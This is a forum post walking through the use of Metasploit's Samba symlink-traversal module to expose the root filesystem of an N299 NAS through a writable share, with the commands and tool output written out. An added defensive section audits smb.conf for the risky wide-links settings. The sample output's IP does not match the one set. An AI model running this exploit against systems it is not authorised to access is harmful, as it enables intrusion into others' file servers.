General NAS-Central Forums

Posted: Sat Oct 06, 2012 9:15 am

NOTE: Because the Video folder is scanned by the Media Server, you must stop it from the NAS menu before this exploit.
In order to access the root filesystem of the N299 we will use Linux BackTrack.

Launch a terminal window and from the terminal we run
Code:
msfconsole

After some loading the prompt will be msf >.
At this prompt we type search samba and we will have a list of available exploits:

Code:
msf > search samba


The command will list all available exploits.
Load the first one with the command:
Code:
msf > use auxiliary/admin/smb/samba_symlink_traversal


Let's see what the options are:
Code:
msf  auxiliary(samba_symlink_traversal) > show options
Module options (auxiliary/admin/smb/samba_symlink_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST                       yes       The target address
   RPORT      445              yes       Set the SMB service port
   SMBSHARE                    yes       The name of a writeable share on the server
   SMBTARGET  rootfs           yes       The name of the directory that should point to the root filesystem



Let's set the options:

Code:
msf  auxiliary(samba_symlink_traversal) > set RHOST 192.168.1.2 (change the IP address to your own NAS IP address)
msf  auxiliary(samba_symlink_traversal) > set SMBSHARE Video (I set the Video folder from the NAS menu to be writable for everyone)
msf  auxiliary(samba_symlink_traversal) > set RPORT 139
msf  auxiliary(samba_symlink_traversal) > set SMBTARGET roothack (the folder where the root directory will be mounted in the Video folder)


Now we run the command exploit:
Code:
msf  auxiliary(samba_symlink_traversal) > exploit

Connecting to the server...
Trying to mount writeable share 'Video'...
Trying to link 'roothack' to the root filesystem...
Now access the following share to browse the root filesystem: \10.1.10.10\Video\roothack\
Auxiliary module execution completed


Now if you go to the network folder Video you will see a folder roothack with all the files of the root filesystem.
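
The defender's side of the walkthrough above, as an added example that is not part of the original post: a small audit that reads an smb.conf and lists the writable shares where a client-created symlink can resolve outside the share. It assumes the stock Samba parameters `wide links`, `unix extensions`, `allow insecure wide links` and `follow symlinks`; the function names, the `legacy` switch and the sample config are made up for illustration.

```python
# Added example, not from the original post. Function names are hypothetical.
TRUE = {"yes", "true", "on", "1"}

def parse_smb_conf(text):
    """Return {section: {key: value}}; names lowercased, spaces in keys dropped."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = sections.setdefault(line[1:-1].strip().lower(), {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            key = "".join(key.lower().split())
            if key in ("writable", "writeable", "writeok"):  # inverted synonyms
                key, value = "readonly", "no" if value.strip().lower() in TRUE else "yes"
            current[key] = value.strip()
    return sections

def flag(settings, key, default):
    return settings[key].lower() in TRUE if key in settings else default

def exposed_shares(text, legacy=False):
    """legacy=True assumes an old smbd: wide links defaults to yes and is not
    tied to unix extensions. legacy=False assumes current smbd behaviour."""
    conf = parse_smb_conf(text)
    g = conf.get("global", {})
    unix_ext = flag(g, "unixextensions", True)
    insecure = flag(g, "allowinsecurewidelinks", False)
    found = []
    for name, share in conf.items():
        eff = {**g, **share}  # share-level settings override [global]
        wide = flag(eff, "widelinks", legacy)
        if not legacy and unix_ext and not insecure:
            wide = False  # current smbd ignores wide links in this state
        writable = not flag(eff, "readonly", True)
        if (name != "global" and writable and unix_ext and wide
                and flag(eff, "followsymlinks", True)):
            found.append(name)
    return sorted(found)

# Constructed sample config, not taken from any real device.
SAMPLE = ("[global]\nwide links = yes\n"
          "[Video]\nread only = no\n"
          "[Backup]\nwriteable = yes\nwide links = no\n"
          "[Docs]\npath = /mnt/docs\n")
```

Any share it reports is cleared by setting `wide links = no` on the share or `unix extensions = no` in `[global]`, then reloading smbd.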

